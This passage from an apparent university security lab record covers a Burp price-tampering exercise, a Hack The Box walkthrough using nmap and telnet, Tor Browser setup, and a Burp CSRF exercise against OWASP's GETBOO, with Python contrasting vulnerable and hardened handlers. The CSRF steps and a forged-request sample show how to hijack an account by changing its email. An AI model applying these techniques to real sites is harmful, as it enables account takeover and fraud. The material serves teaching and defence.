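    """The lab's checkout rule: the order goes through only if store credit covers it."""
    return cart_total(cart) <= STORE_CREDIT_CENTS


def demo():
    """Replay the lab's modified request (price=1) against both handlers."""
    tampered = {"productId": "1", "price": "1", "quantity": "1"}
    vuln_cart = vulnerable_add_to_cart([], tampered)
    safe_cart = safe_add_to_cart([], tampered)
    return {
        "vulnerable_total": cart_total(vuln_cart),
        "vulnerable_order_allowed": can_place_order(vuln_cart),
        "safe_total": cart_total(safe_cart),
        "safe_order_allowed": can_place_order(safe_cart),
        "alert": price_tampering_alert(tampered),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

The hardened handler never needs a price field at all; keeping the alert separately is useful during a transition, because a request that still carries a wrong price is a strong signal that someone is editing traffic in a proxy rather than using the web interface.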

RESULT:
Thus, the implementation of modifying HTTP requests with Burp proxy has been
completed and executed.

EX.NO: 8
INTERNET PROTOCOL SECURITY
CONNECT TO THE TARGET'S NETWORK AND KNOW
THE WAY AROUND A TERMINAL USING NMAP
DATE:

AIM:
To connect to the target's network and know the way around a terminal.
PROCEDURE:
First log in to the hack the box website and download the ovpn file. Then open the
terminal in kali linux and type the following command.

sudo openvpn (downloaded .ovpn file from the website)

Let the configuration script run until you see the Initialization Sequence Completed message
at the very end of the output.

ping {target ip}

When first starting a penetration test or any security evaluation on a target, a primary step is
known as Enumeration. This step consists of documenting the current state of the target to learn
as much as possible about it. After our VPN connection is successfully established, we can ping
the target's IP address to see if our packets reach their destination. You can take the IP address
of your current target from the Starting Point lab's page and paste it into your terminal after
typing the ping command, as illustrated above.
We can cancel the ping command by pressing the CTRL+C combination on our keyboard,
which will be displayed in the terminal as ^C marked above in green.
sudo nmap -sV {target ip}

To start the scanning process, we use the nmap command shown above. nmap stands for
Network Mapper; it sends requests to the target's ports in the hope of receiving a reply, thus
determining whether a given port is open or not. On completion of the scan, we have identified
port 23/tcp in an open state, running the telnet service.
telnet {target ip}

We find out that telnet is an old service used for remote management of other hosts on the
network. Since the target is running this service, it can receive telnet connection requests from
other hosts in the network (such as ourselves). Usually, connection requests through telnet are
configured with username/password combinations for increased security.

We will need to find some credentials that work to continue since there are no other ports open
on the target that we could explore.
Success! We have logged into the target system. We can now go ahead and take a look around
the directory we landed in using the ls command. There is a possibility we might find what we
are looking for.

Copying the flag and pasting it into the Starting Point lab's page will grant you ownership of
this machine, completing the task.
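As an added example (not part of the lab record), the following Python parses the grepable output of the nmap -sV scan used above and flags open services that carry credentials in cleartext, such as the telnet service found on the target; the scan text is a constructed sample, 10.10.10.1 is a made-up address, and an extra ssh port is included so the filter has something to let through.

```python
"""Turn nmap -sV grepable (-oG) output into findings about cleartext management services."""
from typing import NamedTuple

class OpenPort(NamedTuple):
    host: str
    port: int
    proto: str
    state: str
    service: str
    version: str

# Protocols that send credentials unencrypted; telnet is the one found on the lab target.
CLEARTEXT_SERVICES = {"telnet", "ftp", "rlogin", "rsh"}

# Constructed sample output (10.10.10.1 is a made-up target address, and the
# extra ssh port is added so the filtering step has something to pass through).
SAMPLE_SCAN = (
    "# Nmap 7.94 scan initiated as: nmap -sV -oG - 10.10.10.1\n"
    "Host: 10.10.10.1 ()\tStatus: Up\n"
    "Host: 10.10.10.1 ()\tPorts: 22/open/tcp//ssh//OpenSSH 8.9p1/, "
    "23/open/tcp//telnet//Linux telnetd/\tIgnored State: closed (998)\n"
    "# Nmap done -- 1 IP address (1 host up) scanned\n"
)

def parse_grepable(text: str) -> list[OpenPort]:
    """Each port entry is port/state/proto/owner/service/rpcinfo/version/ in -oG output."""
    results = []
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        ports_field = line.split("Ports:", 1)[1].split("\t")[0]
        for entry in ports_field.split(","):
            f = entry.strip().split("/")
            if len(f) < 7:
                continue  # malformed entry: skip it rather than crash
            results.append(OpenPort(host, int(f[0]), f[2], f[1], f[4], f[6]))
    return results

def cleartext_findings(ports: list[OpenPort]) -> list[OpenPort]:
    """Open ports running a service that exposes credentials on the wire."""
    return [p for p in ports if p.state == "open" and p.service in CLEARTEXT_SERVICES]

if __name__ == "__main__":
    for p in cleartext_findings(parse_grepable(SAMPLE_SCAN)):
        print(f"{p.host}:{p.port}/{p.proto} {p.service} ({p.version}) - cleartext credentials")
```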

RESULT:
Thus, the implementation to connect to the target's network and know the way around
a terminal has been completed and executed successfully.

EX.NO: 9
TOR: THE SECOND-GENERATION ONION ROUTER
INSTALLATION AND RUNNING TOR
DATE:

AIM:
To study about the installation and purpose of Tor browser.
PROCEDURE:
When you start Tor Browser, you will see the Connect to Tor window. This offers you
the option to either connect directly to the Tor network, or to configure Tor Browser for your
connection. There's a checkbox which asks whether you always want to get automatically
connected to the Tor network, if this is the case, check the box.
Connect:

In most cases, choosing "Connect" will allow you to connect to the Tor network without
any further configuration.
Once clicked, a status bar will appear, showing Tor's connection progress. If you are on
a relatively fast connection, but this bar seems to get stuck at a certain point, try the 'Connection
Assist' or see the Troubleshooting page for help solving the problem. Or, if you know that your
connection is censored or uses a proxy, you should click on "Tor Network Settings".

Connection Assist:
If Tor is blocked in your location, trying a bridge may help. Connection Assist can
choose one for you using your location.

If Connection Assist is unable to determine your location or you want to configure your
connection manually instead, you can select your region from the dropdown menu and click
on 'Try a Bridge'

Configure:
Tor Browser will take you through a series of configuration options. The Connection
Assist informs you about the state of your Internet connection and your connection to the Tor
network.

The first checkbox is 'Quickstart'. If selected, every time you open Tor Browser, it will
try to connect with your previous network settings.

If you know your connection is censored, or you have tried and failed to connect to the
Tor network and no other solutions have worked, you can configure Tor Browser to use a
pluggable transport. 'Bridges' will display the Circumvention section to configure a pluggable
transport or to connect using Bridges.

Other Options:
If your connection uses a proxy you can configure it by clicking on 'Settings ...' against
'Configure how Tor Browser connects to the Internet'. In most cases, this is not necessary. You
will usually know if you need to select this checkbox because the same settings will be used
for other browsers on your system. If possible, ask your network administrator for guidance. If
your connection does not use a proxy, click "Connect".

RESULT:
Thus, the installation and purpose of Tor browser has been completed and executed
successfully.

EX.NO: 10
Content Beyond Syllabus
Using Burp to Test for Cross-Site Request Forgery (CSRF)
DATE:

Aim
To implement Cross-Site Request Forgery (CSRF) using Burp Suite.

Procedure
Cross-site request forgery (CSRF) is an attack which forces an end user to execute unwanted
actions on a web application to which they are currently authenticated.
CSRF vulnerabilities may arise when applications rely solely on HTTP cookies to identify the user
that has issued a particular request. Because browsers automatically add cookies to requests
regardless of the request's origin, it may be possible for an attacker to create a malicious web site that
forges a cross-domain request to the vulnerable application.
In this example we will be using Burp's CSRF PoC generator to help us hijack a user's account by
changing their details (the email address associated with the account) on an old, vulnerable version
of "GETBOO".
The version of "GETBOO" we are using is taken from OWASP's Broken Web Application
Project. Find out how to download, install and use this project.

Burp Scanner is able to locate potential CSRF issues.


The Scanner identifies a number of conditions, including when an application relies solely on HTTP
cookies to identify the user, that result in a request being vulnerable to CSRF.

To manually test for CSRF vulnerabilities, first, ensure that Burp is correctly configured with your
browser.
In the Burp Proxy "Intercept" tab, ensure "Intercept is off".
Visit the web application you are testing in your browser.

Ensure you are authenticated to the web application you are testing.
In this example by logging in to the application.
You can log in using the credentials user:user.
Access the page you are testing.

Alter the value in the field/s you wish to change, in this case "Email".
In this example we will add a number to the email.

Return to Burp.
In the Proxy "Intercept" tab, ensure "Intercept is on".

Submit the request so that it is captured by Burp.
In the "Proxy" tab, right click on the raw request to bring up the context menu.
Go to the "Engagement tools" options and click "Generate CSRF PoC".
Note: You can also generate CSRF PoCs via the context menu in any location where HTTP requests
are shown, such as the site map or Proxy history.

In the "CSRF PoC generator" window you should alter the value of the user supplied input.
In this example we will change to "[email protected]".
In the same window, click "Copy HTML".

Open a text editor and paste the copied HTML.
Save the file as an HTML file.

In the Proxy "Intercept" tab, ensure "Intercept is off".


If necessary, log back in to the application.
Initially we will test the attack on the same account.
Open the HTML file in the same browser.

Depending on the CSRF PoC options, you may need to submit the request yourself or it may be submitted
automatically.
In this case we are submitting the request manually.

If the account information has been changed, the attack has succeeded; this
serves as an initial check that the attack is plausible.

Now login to the application using a different account (in this example the admin account for the
application).
Once you are logged in, perform the attack again by opening the file in the same browser.

The attack is successful if the account information in the web application has been altered.
A successful attack shows that the web application is vulnerable to CSRF.

For the attack to fire in a real world environment, the victim needs to access a page under the attacker's
control while authenticated.
In our example web application, a new password can be set for the account using the email address.
In this way an attacker could gain full ownership of the account.
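As an added example, not code from the lab or from GETBOO: a minimal Python model of the "change email" handler in the vulnerable form described above (the user is identified by the session cookie alone, so a generated PoC page submitting with the victim's cookie succeeds) beside a hardened form that rejects a foreign Origin and requires a per-session CSRF token; the session store, Request class, origins and addresses are all constructed for the demo.

```python
"""Vulnerable 'change email' handler beside a hardened one, modelled on the GETBOO form."""
import hmac
import secrets
from dataclasses import dataclass, field

TRUSTED_ORIGIN = "https://getboo.example"  # constructed origin of the application
# Server-side session store keyed by the cookie value; one logged-in admin for the demo.
SESSIONS = {"s3ss10n": {"user": "admin", "email": "admin@getboo.example",
                        "csrf": secrets.token_hex(16)}}

@dataclass
class Request:
    cookies: dict
    form: dict
    headers: dict = field(default_factory=dict)

def change_email_vulnerable(req: Request) -> int:
    """Identifies the user by the session cookie alone: a forged cross-site POST succeeds."""
    sess = SESSIONS.get(req.cookies.get("sid"))
    if sess is None:
        return 401
    sess["email"] = req.form["email"]
    return 200

def change_email_hardened(req: Request) -> int:
    """Rejects a foreign Origin and requires the per-session token the real form embeds."""
    sess = SESSIONS.get(req.cookies.get("sid"))
    if sess is None:
        return 401
    origin = req.headers.get("Origin")
    if origin is not None and origin != TRUSTED_ORIGIN:
        return 403  # browser-supplied Origin names the attacker's site
    supplied = req.form.get("csrf_token", "").encode()
    if not hmac.compare_digest(supplied, sess["csrf"].encode()):
        return 403  # token missing or wrong: the attacker's page cannot read it
    sess["email"] = req.form["email"]
    return 200

def forged_request() -> Request:
    """What a generated CSRF PoC page submits: the victim's cookie rides along automatically."""
    return Request(cookies={"sid": "s3ss10n"}, form={"email": "attacker@evil.example"},
                   headers={"Origin": "https://evil.example"})

def legitimate_request() -> Request:
    """The application's own form: same cookie, plus the token only that page can include."""
    return Request(cookies={"sid": "s3ss10n"},
                   form={"email": "new@getboo.example", "csrf_token": SESSIONS["s3ss10n"]["csrf"]},
                   headers={"Origin": TRUSTED_ORIGIN})
```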

RESULT:
Thus, the Cross-Site Request Forgery test has been implemented using
Burp Suite.
